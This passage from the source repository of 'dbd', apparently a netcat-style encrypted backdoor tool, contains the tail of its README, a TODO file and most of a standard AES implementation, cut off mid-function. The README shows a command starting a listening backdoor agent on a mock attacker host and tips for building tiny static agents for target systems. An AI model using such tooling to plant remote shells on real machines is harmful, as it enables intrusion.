listening dbd agent on evil.nationalbankofuganda.com running with the options: 203 | 204 | $ dbd -l -p 995 -k customcrypto 205 | 206 | Another advanced trick is to compile dbd using dietlibc or uClibc. to compile a dietlibc linux dbd agent, use: 207 | 208 | $ make unix CROSS_COMPILE="diet -Os " 209 | 210 | Pay attention to the space after the s in the string. This allows the Makefile to add gcc with the standard CFLAGS and LDFLAGS so your agent builds properly. The advantage of using dietlibc is that it produces a very tiny 100% static executable for the target environment (around 70K for a linux dbd agent before packing as opposed to the standard 700K+ with glibc and gcc -static). Using uClibc is even easier, since you just set the crossbuild prefix for your toolchain under CROSS_COMPILE. 211 | 212 | ##LICENSE 213 | dbd Copyright (C) 2013 Kyle Barnthouse kbarnthouse@hephaestussec.com 214 | 215 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. 216 | 217 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 218 | 219 | You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 220 | 221 | See the COPYING file for more information. 222 | --- 223 | dbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe Devine devine@cr0.net and is distributed under the GNU General Public License (GPL). 224 | 225 | Some code (for doexec_win32.h) has been derived from doexec.c from the Win32 port of Netcat (C) Weld Pond and hobbit. Parts of doexec.c is Copyright (C) 1994 Nathaniel W. Mishkin (doexec.c code was originally derived from rlogind.exe). 226 | 227 | The original version of Netcat was written by hobbit hobbit@avian.org. The NT version was done by Weld Pond weld@l0pht.com. 228 | 229 | --- 230 | 231 | (C) Kyle Barnthouse [](mailto:kbarnthouse@hephaestussec.com) 232 | Security Consultant 233 | [gitbrew.org](https://gitbrew.org) 234 | [Hephaestus Security](http://hephaestussec.com) 235 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | * Improve documentation 2 | * ??? 3 | * PROFIT! 4 | 5 | All joking aside, once it's documented, easy for other tools to work with, 6 | and can easily build for most popular target environments focus will be 7 | shifted to creating tools that can utilize it. 8 | -------------------------------------------------------------------------------- /aes.c: -------------------------------------------------------------------------------- 1 | /* 2 | * FIPS-197 compliant AES implementation 3 | * 4 | * Copyright (C) 2001-2004 Christophe Devine 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include "aes.h" 22 | 23 | /* uncomment the following line to run the test suite */ 24 | 25 | /* #define TEST */ 26 | 27 | /* uncomment the following line to use pre-computed tables */ 28 | /* otherwise the tables will be generated at the first run */ 29 | 30 | /* #define FIXED_TABLES */ 31 | 32 | #ifndef FIXED_TABLES 33 | 34 | /* forward S-box & tables */ 35 | 36 | uint32 FSb[256]; 37 | uint32 FT0[256]; 38 | uint32 FT1[256]; 39 | uint32 FT2[256]; 40 | uint32 FT3[256]; 41 | 42 | /* reverse S-box & tables */ 43 | 44 | uint32 RSb[256]; 45 | uint32 RT0[256]; 46 | uint32 RT1[256]; 47 | uint32 RT2[256]; 48 | uint32 RT3[256]; 49 | 50 | /* round constants */ 51 | 52 | uint32 RCON[10]; 53 | 54 | /* tables generation flag */ 55 | 56 | int do_init = 1; 57 | 58 | /* tables generation routine */ 59 | 60 | #define ROTR8(x) ( ( ( x << 24 ) & 0xFFFFFFFF ) | \ 61 | ( ( x & 0xFFFFFFFF ) >> 8 ) ) 62 | 63 | #define XTIME(x) ( ( x << 1 ) ^ ( ( x & 0x80 ) ? 0x1B : 0x00 ) ) 64 | #define MUL(x,y) ( ( x && y ) ? aes_gen_tables_pow[(aes_gen_tables_log[x] + aes_gen_tables_log[y]) % 255] : 0 ) 65 | 66 | void aes_gen_tables( void ) 67 | { 68 | int i; 69 | uint8 x, y; 70 | uint8 aes_gen_tables_pow[256]; 71 | uint8 aes_gen_tables_log[256]; 72 | 73 | /* compute pow and log tables over GF(2^8) */ 74 | 75 | for( i = 0, x = 1; i < 256; i++, x ^= XTIME( x ) ) 76 | { 77 | aes_gen_tables_pow[i] = x; 78 | aes_gen_tables_log[x] = i; 79 | } 80 | 81 | /* calculate the round constants */ 82 | 83 | for( i = 0, x = 1; i < 10; i++, x = XTIME( x ) ) 84 | { 85 | RCON[i] = (uint32) x << 24; 86 | } 87 | 88 | /* generate the forward and reverse S-boxes */ 89 | 90 | FSb[0x00] = 0x63; 91 | RSb[0x63] = 0x00; 92 | 93 | for( i = 1; i < 256; i++ ) 94 | { 95 | x = aes_gen_tables_pow[255 - aes_gen_tables_log[i]]; 96 | 97 | y = x; y = ( y << 1 ) | ( y >> 7 ); 98 | x ^= y; y = ( y << 1 ) | ( y >> 7 ); 99 | x ^= y; y = ( y << 1 ) | ( y >> 7 ); 100 | x ^= y; y = ( y << 1 ) | ( y >> 7 ); 101 | x ^= y ^ 0x63; 102 | 103 | FSb[i] = x; 104 | RSb[x] = i; 105 | } 106 | 107 | /* generate the forward and reverse tables */ 108 | 109 | for( i = 0; i < 256; i++ ) 110 | { 111 | x = FSb[i]; y = XTIME( x ); 112 | 113 | FT0[i] = (uint32) ( x ^ y ) ^ 114 | ( (uint32) x << 8 ) ^ 115 | ( (uint32) x << 16 ) ^ 116 | ( (uint32) y << 24 ); 117 | 118 | FT0[i] &= 0xFFFFFFFF; 119 | 120 | FT1[i] = ROTR8( FT0[i] ); 121 | FT2[i] = ROTR8( FT1[i] ); 122 | FT3[i] = ROTR8( FT2[i] ); 123 | 124 | y = RSb[i]; 125 | 126 | RT0[i] = ( (uint32) MUL( 0x0B, y ) ) ^ 127 | ( (uint32) MUL( 0x0D, y ) << 8 ) ^ 128 | ( (uint32) MUL( 0x09, y ) << 16 ) ^ 129 | ( (uint32) MUL( 0x0E, y ) << 24 ); 130 | 131 | RT0[i] &= 0xFFFFFFFF; 132 | 133 | RT1[i] = ROTR8( RT0[i] ); 134 | RT2[i] = ROTR8( RT1[i] ); 135 | RT3[i] = ROTR8( RT2[i] ); 136 | } 137 | } 138 | 139 | #else 140 | 141 | /* forward S-box */ 142 | 143 | static const uint32 FSb[256] = 144 | { 145 | 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 146 | 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 147 | 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 148 | 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 149 | 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 150 | 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 151 | 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 152 | 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 153 | 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 154 | 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 155 | 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 156 | 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 157 | 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 158 | 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 159 | 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 160 | 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 161 | 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 162 | 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 163 | 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 164 | 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 165 | 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 166 | 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 167 | 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 168 | 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 169 | 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 170 | 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 171 | 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 172 | 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 173 | 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 174 | 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 175 | 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 176 | 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 177 | }; 178 | 179 | /* forward tables */ 180 | 181 | #define FT \ 182 | \ 183 | V(C6,63,63,A5), V(F8,7C,7C,84), V(EE,77,77,99), V(F6,7B,7B,8D), \ 184 | V(FF,F2,F2,0D), V(D6,6B,6B,BD), V(DE,6F,6F,B1), V(91,C5,C5,54), \ 185 | V(60,30,30,50), V(02,01,01,03), V(CE,67,67,A9), V(56,2B,2B,7D), \ 186 | V(E7,FE,FE,19), V(B5,D7,D7,62), V(4D,AB,AB,E6), V(EC,76,76,9A), \ 187 | V(8F,CA,CA,45), V(1F,82,82,9D), V(89,C9,C9,40), V(FA,7D,7D,87), \ 188 | V(EF,FA,FA,15), V(B2,59,59,EB), V(8E,47,47,C9), V(FB,F0,F0,0B), \ 189 | V(41,AD,AD,EC), V(B3,D4,D4,67), V(5F,A2,A2,FD), V(45,AF,AF,EA), \ 190 | V(23,9C,9C,BF), V(53,A4,A4,F7), V(E4,72,72,96), V(9B,C0,C0,5B), \ 191 | V(75,B7,B7,C2), V(E1,FD,FD,1C), V(3D,93,93,AE), V(4C,26,26,6A), \ 192 | V(6C,36,36,5A), V(7E,3F,3F,41), V(F5,F7,F7,02), V(83,CC,CC,4F), \ 193 | V(68,34,34,5C), V(51,A5,A5,F4), V(D1,E5,E5,34), V(F9,F1,F1,08), \ 194 | V(E2,71,71,93), V(AB,D8,D8,73), V(62,31,31,53), V(2A,15,15,3F), \ 195 | V(08,04,04,0C), V(95,C7,C7,52), V(46,23,23,65), V(9D,C3,C3,5E), \ 196 | V(30,18,18,28), V(37,96,96,A1), V(0A,05,05,0F), V(2F,9A,9A,B5), \ 197 | V(0E,07,07,09), V(24,12,12,36), V(1B,80,80,9B), V(DF,E2,E2,3D), \ 198 | V(CD,EB,EB,26), V(4E,27,27,69), V(7F,B2,B2,CD), V(EA,75,75,9F), \ 199 | V(12,09,09,1B), V(1D,83,83,9E), V(58,2C,2C,74), V(34,1A,1A,2E), \ 200 | V(36,1B,1B,2D), V(DC,6E,6E,B2), V(B4,5A,5A,EE), V(5B,A0,A0,FB), \ 201 | V(A4,52,52,F6), V(76,3B,3B,4D), V(B7,D6,D6,61), V(7D,B3,B3,CE), \ 202 | V(52,29,29,7B), V(DD,E3,E3,3E), V(5E,2F,2F,71), V(13,84,84,97), \ 203 | V(A6,53,53,F5), V(B9,D1,D1,68), V(00,00,00,00), V(C1,ED,ED,2C), \ 204 | V(40,20,20,60), V(E3,FC,FC,1F), V(79,B1,B1,C8), V(B6,5B,5B,ED), \ 205 | V(D4,6A,6A,BE), V(8D,CB,CB,46), V(67,BE,BE,D9), V(72,39,39,4B), \ 206 | V(94,4A,4A,DE), V(98,4C,4C,D4), V(B0,58,58,E8), V(85,CF,CF,4A), \ 207 | V(BB,D0,D0,6B), V(C5,EF,EF,2A), V(4F,AA,AA,E5), V(ED,FB,FB,16), \ 208 | V(86,43,43,C5), V(9A,4D,4D,D7), V(66,33,33,55), V(11,85,85,94), \ 209 | V(8A,45,45,CF), V(E9,F9,F9,10), V(04,02,02,06), V(FE,7F,7F,81), \ 210 | V(A0,50,50,F0), V(78,3C,3C,44), V(25,9F,9F,BA), V(4B,A8,A8,E3), \ 211 | V(A2,51,51,F3), V(5D,A3,A3,FE), V(80,40,40,C0), V(05,8F,8F,8A), \ 212 | V(3F,92,92,AD), V(21,9D,9D,BC), V(70,38,38,48), V(F1,F5,F5,04), \ 213 | V(63,BC,BC,DF), V(77,B6,B6,C1), V(AF,DA,DA,75), V(42,21,21,63), \ 214 | V(20,10,10,30), V(E5,FF,FF,1A), V(FD,F3,F3,0E), V(BF,D2,D2,6D), \ 215 | V(81,CD,CD,4C), V(18,0C,0C,14), V(26,13,13,35), V(C3,EC,EC,2F), \ 216 | V(BE,5F,5F,E1), V(35,97,97,A2), V(88,44,44,CC), V(2E,17,17,39), \ 217 | V(93,C4,C4,57), V(55,A7,A7,F2), V(FC,7E,7E,82), V(7A,3D,3D,47), \ 218 | V(C8,64,64,AC), V(BA,5D,5D,E7), V(32,19,19,2B), V(E6,73,73,95), \ 219 | V(C0,60,60,A0), V(19,81,81,98), V(9E,4F,4F,D1), V(A3,DC,DC,7F), \ 220 | V(44,22,22,66), V(54,2A,2A,7E), V(3B,90,90,AB), V(0B,88,88,83), \ 221 | V(8C,46,46,CA), V(C7,EE,EE,29), V(6B,B8,B8,D3), V(28,14,14,3C), \ 222 | V(A7,DE,DE,79), V(BC,5E,5E,E2), V(16,0B,0B,1D), V(AD,DB,DB,76), \ 223 | V(DB,E0,E0,3B), V(64,32,32,56), V(74,3A,3A,4E), V(14,0A,0A,1E), \ 224 | V(92,49,49,DB), V(0C,06,06,0A), V(48,24,24,6C), V(B8,5C,5C,E4), \ 225 | V(9F,C2,C2,5D), V(BD,D3,D3,6E), V(43,AC,AC,EF), V(C4,62,62,A6), \ 226 | V(39,91,91,A8), V(31,95,95,A4), V(D3,E4,E4,37), V(F2,79,79,8B), \ 227 | V(D5,E7,E7,32), V(8B,C8,C8,43), V(6E,37,37,59), V(DA,6D,6D,B7), \ 228 | V(01,8D,8D,8C), V(B1,D5,D5,64), V(9C,4E,4E,D2), V(49,A9,A9,E0), \ 229 | V(D8,6C,6C,B4), V(AC,56,56,FA), V(F3,F4,F4,07), V(CF,EA,EA,25), \ 230 | V(CA,65,65,AF), V(F4,7A,7A,8E), V(47,AE,AE,E9), V(10,08,08,18), \ 231 | V(6F,BA,BA,D5), V(F0,78,78,88), V(4A,25,25,6F), V(5C,2E,2E,72), \ 232 | V(38,1C,1C,24), V(57,A6,A6,F1), V(73,B4,B4,C7), V(97,C6,C6,51), \ 233 | V(CB,E8,E8,23), V(A1,DD,DD,7C), V(E8,74,74,9C), V(3E,1F,1F,21), \ 234 | V(96,4B,4B,DD), V(61,BD,BD,DC), V(0D,8B,8B,86), V(0F,8A,8A,85), \ 235 | V(E0,70,70,90), V(7C,3E,3E,42), V(71,B5,B5,C4), V(CC,66,66,AA), \ 236 | V(90,48,48,D8), V(06,03,03,05), V(F7,F6,F6,01), V(1C,0E,0E,12), \ 237 | V(C2,61,61,A3), V(6A,35,35,5F), V(AE,57,57,F9), V(69,B9,B9,D0), \ 238 | V(17,86,86,91), V(99,C1,C1,58), V(3A,1D,1D,27), V(27,9E,9E,B9), \ 239 | V(D9,E1,E1,38), V(EB,F8,F8,13), V(2B,98,98,B3), V(22,11,11,33), \ 240 | V(D2,69,69,BB), V(A9,D9,D9,70), V(07,8E,8E,89), V(33,94,94,A7), \ 241 | V(2D,9B,9B,B6), V(3C,1E,1E,22), V(15,87,87,92), V(C9,E9,E9,20), \ 242 | V(87,CE,CE,49), V(AA,55,55,FF), V(50,28,28,78), V(A5,DF,DF,7A), \ 243 | V(03,8C,8C,8F), V(59,A1,A1,F8), V(09,89,89,80), V(1A,0D,0D,17), \ 244 | V(65,BF,BF,DA), V(D7,E6,E6,31), V(84,42,42,C6), V(D0,68,68,B8), \ 245 | V(82,41,41,C3), V(29,99,99,B0), V(5A,2D,2D,77), V(1E,0F,0F,11), \ 246 | V(7B,B0,B0,CB), V(A8,54,54,FC), V(6D,BB,BB,D6), V(2C,16,16,3A) 247 | 248 | #define V(a,b,c,d) 0x##a##b##c##d 249 | static const uint32 FT0[256] = { FT }; 250 | #undef V 251 | 252 | #define V(a,b,c,d) 0x##d##a##b##c 253 | static const uint32 FT1[256] = { FT }; 254 | #undef V 255 | 256 | #define V(a,b,c,d) 0x##c##d##a##b 257 | static const uint32 FT2[256] = { FT }; 258 | #undef V 259 | 260 | #define V(a,b,c,d) 0x##b##c##d##a 261 | static const uint32 FT3[256] = { FT }; 262 | #undef V 263 | 264 | #undef FT 265 | 266 | /* reverse S-box */ 267 | 268 | static const uint32 RSb[256] = 269 | { 270 | 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 271 | 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, 272 | 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 273 | 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, 274 | 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 275 | 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, 276 | 0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 277 | 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, 278 | 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 279 | 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, 280 | 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 281 | 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, 282 | 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 283 | 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, 284 | 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 285 | 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, 286 | 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 287 | 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, 288 | 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 289 | 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, 290 | 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 291 | 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 292 | 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 293 | 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, 294 | 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 295 | 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, 296 | 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 297 | 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, 298 | 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 299 | 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, 300 | 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 301 | 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D 302 | }; 303 | 304 | /* reverse tables */ 305 | 306 | #define RT \ 307 | \ 308 | V(51,F4,A7,50), V(7E,41,65,53), V(1A,17,A4,C3), V(3A,27,5E,96), \ 309 | V(3B,AB,6B,CB), V(1F,9D,45,F1), V(AC,FA,58,AB), V(4B,E3,03,93), \ 310 | V(20,30,FA,55), V(AD,76,6D,F6), V(88,CC,76,91), V(F5,02,4C,25), \ 311 | V(4F,E5,D7,FC), V(C5,2A,CB,D7), V(26,35,44,80), V(B5,62,A3,8F), \ 312 | V(DE,B1,5A,49), V(25,BA,1B,67), V(45,EA,0E,98), V(5D,FE,C0,E1), \ 313 | V(C3,2F,75,02), V(81,4C,F0,12), V(8D,46,97,A3), V(6B,D3,F9,C6), \ 314 | V(03,8F,5F,E7), V(15,92,9C,95), V(BF,6D,7A,EB), V(95,52,59,DA), \ 315 | V(D4,BE,83,2D), V(58,74,21,D3), V(49,E0,69,29), V(8E,C9,C8,44), \ 316 | V(75,C2,89,6A), V(F4,8E,79,78), V(99,58,3E,6B), V(27,B9,71,DD), \ 317 | V(BE,E1,4F,B6), V(F0,88,AD,17), V(C9,20,AC,66), V(7D,CE,3A,B4), \ 318 | V(63,DF,4A,18), V(E5,1A,31,82), V(97,51,33,60), V(62,53,7F,45), \ 319 | V(B1,64,77,E0), V(BB,6B,AE,84), V(FE,81,A0,1C), V(F9,08,2B,94), \ 320 | V(70,48,68,58), V(8F,45,FD,19), V(94,DE,6C,87), V(52,7B,F8,B7), \ 321 | V(AB,73,D3,23), V(72,4B,02,E2), V(E3,1F,8F,57), V(66,55,AB,2A), \ 322 | V(B2,EB,28,07), V(2F,B5,C2,03), V(86,C5,7B,9A), V(D3,37,08,A5), \ 323 | V(30,28,87,F2), V(23,BF,A5,B2), V(02,03,6A,BA), V(ED,16,82,5C), \ 324 | V(8A,CF,1C,2B), V(A7,79,B4,92), V(F3,07,F2,F0), V(4E,69,E2,A1), \ 325 | V(65,DA,F4,CD), V(06,05,BE,D5), V(D1,34,62,1F), V(C4,A6,FE,8A), \ 326 | V(34,2E,53,9D), V(A2,F3,55,A0), V(05,8A,E1,32), V(A4,F6,EB,75), \ 327 | V(0B,83,EC,39), V(40,60,EF,AA), V(5E,71,9F,06), V(BD,6E,10,51), \ 328 | V(3E,21,8A,F9), V(96,DD,06,3D), V(DD,3E,05,AE), V(4D,E6,BD,46), \ 329 | V(91,54,8D,B5), V(71,C4,5D,05), V(04,06,D4,6F), V(60,50,15,FF), \ 330 | V(19,98,FB,24), V(D6,BD,E9,97), V(89,40,43,CC), V(67,D9,9E,77), \ 331 | V(B0,E8,42,BD), V(07,89,8B,88), V(E7,19,5B,38), V(79,C8,EE,DB), \ 332 | V(A1,7C,0A,47), V(7C,42,0F,E9), V(F8,84,1E,C9), V(00,00,00,00), \ 333 | V(09,80,86,83), V(32,2B,ED,48), V(1E,11,70,AC), V(6C,5A,72,4E), \ 334 | V(FD,0E,FF,FB), V(0F,85,38,56), V(3D,AE,D5,1E), V(36,2D,39,27), \ 335 | V(0A,0F,D9,64), V(68,5C,A6,21), V(9B,5B,54,D1), V(24,36,2E,3A), \ 336 | V(0C,0A,67,B1), V(93,57,E7,0F), V(B4,EE,96,D2), V(1B,9B,91,9E), \ 337 | V(80,C0,C5,4F), V(61,DC,20,A2), V(5A,77,4B,69), V(1C,12,1A,16), \ 338 | V(E2,93,BA,0A), V(C0,A0,2A,E5), V(3C,22,E0,43), V(12,1B,17,1D), \ 339 | V(0E,09,0D,0B), V(F2,8B,C7,AD), V(2D,B6,A8,B9), V(14,1E,A9,C8), \ 340 | V(57,F1,19,85), V(AF,75,07,4C), V(EE,99,DD,BB), V(A3,7F,60,FD), \ 341 | V(F7,01,26,9F), V(5C,72,F5,BC), V(44,66,3B,C5), V(5B,FB,7E,34), \ 342 | V(8B,43,29,76), V(CB,23,C6,DC), V(B6,ED,FC,68), V(B8,E4,F1,63), \ 343 | V(D7,31,DC,CA), V(42,63,85,10), V(13,97,22,40), V(84,C6,11,20), \ 344 | V(85,4A,24,7D), V(D2,BB,3D,F8), V(AE,F9,32,11), V(C7,29,A1,6D), \ 345 | V(1D,9E,2F,4B), V(DC,B2,30,F3), V(0D,86,52,EC), V(77,C1,E3,D0), \ 346 | V(2B,B3,16,6C), V(A9,70,B9,99), V(11,94,48,FA), V(47,E9,64,22), \ 347 | V(A8,FC,8C,C4), V(A0,F0,3F,1A), V(56,7D,2C,D8), V(22,33,90,EF), \ 348 | V(87,49,4E,C7), V(D9,38,D1,C1), V(8C,CA,A2,FE), V(98,D4,0B,36), \ 349 | V(A6,F5,81,CF), V(A5,7A,DE,28), V(DA,B7,8E,26), V(3F,AD,BF,A4), \ 350 | V(2C,3A,9D,E4), V(50,78,92,0D), V(6A,5F,CC,9B), V(54,7E,46,62), \ 351 | V(F6,8D,13,C2), V(90,D8,B8,E8), V(2E,39,F7,5E), V(82,C3,AF,F5), \ 352 | V(9F,5D,80,BE), V(69,D0,93,7C), V(6F,D5,2D,A9), V(CF,25,12,B3), \ 353 | V(C8,AC,99,3B), V(10,18,7D,A7), V(E8,9C,63,6E), V(DB,3B,BB,7B), \ 354 | V(CD,26,78,09), V(6E,59,18,F4), V(EC,9A,B7,01), V(83,4F,9A,A8), \ 355 | V(E6,95,6E,65), V(AA,FF,E6,7E), V(21,BC,CF,08), V(EF,15,E8,E6), \ 356 | V(BA,E7,9B,D9), V(4A,6F,36,CE), V(EA,9F,09,D4), V(29,B0,7C,D6), \ 357 | V(31,A4,B2,AF), V(2A,3F,23,31), V(C6,A5,94,30), V(35,A2,66,C0), \ 358 | V(74,4E,BC,37), V(FC,82,CA,A6), V(E0,90,D0,B0), V(33,A7,D8,15), \ 359 | V(F1,04,98,4A), V(41,EC,DA,F7), V(7F,CD,50,0E), V(17,91,F6,2F), \ 360 | V(76,4D,D6,8D), V(43,EF,B0,4D), V(CC,AA,4D,54), V(E4,96,04,DF), \ 361 | V(9E,D1,B5,E3), V(4C,6A,88,1B), V(C1,2C,1F,B8), V(46,65,51,7F), \ 362 | V(9D,5E,EA,04), V(01,8C,35,5D), V(FA,87,74,73), V(FB,0B,41,2E), \ 363 | V(B3,67,1D,5A), V(92,DB,D2,52), V(E9,10,56,33), V(6D,D6,47,13), \ 364 | V(9A,D7,61,8C), V(37,A1,0C,7A), V(59,F8,14,8E), V(EB,13,3C,89), \ 365 | V(CE,A9,27,EE), V(B7,61,C9,35), V(E1,1C,E5,ED), V(7A,47,B1,3C), \ 366 | V(9C,D2,DF,59), V(55,F2,73,3F), V(18,14,CE,79), V(73,C7,37,BF), \ 367 | V(53,F7,CD,EA), V(5F,FD,AA,5B), V(DF,3D,6F,14), V(78,44,DB,86), \ 368 | V(CA,AF,F3,81), V(B9,68,C4,3E), V(38,24,34,2C), V(C2,A3,40,5F), \ 369 | V(16,1D,C3,72), V(BC,E2,25,0C), V(28,3C,49,8B), V(FF,0D,95,41), \ 370 | V(39,A8,01,71), V(08,0C,B3,DE), V(D8,B4,E4,9C), V(64,56,C1,90), \ 371 | V(7B,CB,84,61), V(D5,32,B6,70), V(48,6C,5C,74), V(D0,B8,57,42) 372 | 373 | #define V(a,b,c,d) 0x##a##b##c##d 374 | static const uint32 RT0[256] = { RT }; 375 | #undef V 376 | 377 | #define V(a,b,c,d) 0x##d##a##b##c 378 | static const uint32 RT1[256] = { RT }; 379 | #undef V 380 | 381 | #define V(a,b,c,d) 0x##c##d##a##b 382 | static const uint32 RT2[256] = { RT }; 383 | #undef V 384 | 385 | #define V(a,b,c,d) 0x##b##c##d##a 386 | static const uint32 RT3[256] = { RT }; 387 | #undef V 388 | 389 | #undef RT 390 | 391 | /* round constants */ 392 | 393 | static const uint32 RCON[10] = 394 | { 395 | 0x01000000, 0x02000000, 0x04000000, 0x08000000, 396 | 0x10000000, 0x20000000, 0x40000000, 0x80000000, 397 | 0x1B000000, 0x36000000 398 | }; 399 | 400 | int do_init = 0; 401 | 402 | void aes_gen_tables( void ) 403 | { 404 | } 405 | 406 | #endif 407 | 408 | /* platform-independant 32-bit integer manipulation macros */ 409 | 410 | #define GET_UINT32(n,b,i) \ 411 | { \ 412 | (n) = ( (uint32) (b)[(i) ] << 24 ) \ 413 | | ( (uint32) (b)[(i) + 1] << 16 ) \ 414 | | ( (uint32) (b)[(i) + 2] << 8 ) \ 415 | | ( (uint32) (b)[(i) + 3] ); \ 416 | } 417 | 418 | #define PUT_UINT32(n,b,i) \ 419 | { \ 420 | (b)[(i) ] = (uint8) ( (n) >> 24 ); \ 421 | (b)[(i) + 1] = (uint8) ( (n) >> 16 ); \ 422 | (b)[(i) + 2] = (uint8) ( (n) >> 8 ); \ 423 | (b)[(i) + 3] = (uint8) ( (n) ); \ 424 | } 425 | 426 | /* decryption key schedule tables */ 427 | 428 | int KT_init = 1; 429 | 430 | uint32 KT0[256]; 431 | uint32 KT1[256]; 432 | uint32 KT2[256]; 433 | uint32 KT3[256]; 434 | 435 | /* AES key scheduling routine */ 436 | 437 | int aes_set_key( aes_context 